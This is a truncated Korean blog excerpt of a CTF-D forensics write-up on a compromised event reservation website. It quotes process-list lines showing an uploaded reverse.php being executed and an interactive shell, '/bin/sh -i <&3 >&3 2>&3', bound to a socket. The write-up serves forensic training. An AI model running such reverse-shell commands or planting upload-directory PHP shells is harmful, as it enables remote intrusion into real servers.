![[CTF-D] 이벤트 예약 웹사이트를 운영하고...](https://mblogthumb-phinf.pstatic.net/MjAyMDAxMDNfMjkx/MDAxNTc4MDI5Njk2MzE0.xVD2w1y4Q1XVi018CWu_RlxTcw0g7VER2q1Eb3pBW-sg.bANBsXFJliKKxcekM-Dip-DF0vPVALLLIux_UWPtYCgg.JPEG.pouerccat/%C4%B8%C3%B3.JPG?type=w2 "[CTF-D] 이벤트 예약 웹사이트를 운영하고...")
3개의 문제가 동시에 연결되어있다. 첨부되어있는 파일을 받아보면.. 여러개의 파일이 있는데 증거수집 도구를 이용해서 파일을 얻은 것 같다.확인해 보자.가장 먼저 확인한 것은 프로세스 정보다.ps_eaf 파일의 87번째 줄을 확인해보면.. * sh -c php -f /var/www/upload/editor/image/reverse.php* php -f /var/www/upload/editor/image/reverse.php* sh -c /bin/sh -i <&3 >&3 2>&3위와같이 3개의 프로세스가 동작하는 것을 알 수있다.sh 명령어를 통해 reverse.php를 실행했는데.. 어떻게 실행을 했을까? 메모해놓고 더확인해 보자.access.log로 reverse를 검색했더니... 나오는게 없었다...뭐야..그런데 accesslog를 자..........
원문링크 : [CTF-D] 이벤트 예약 웹사이트를 운영하고...
네이버 블로그
티스토리
커뮤니티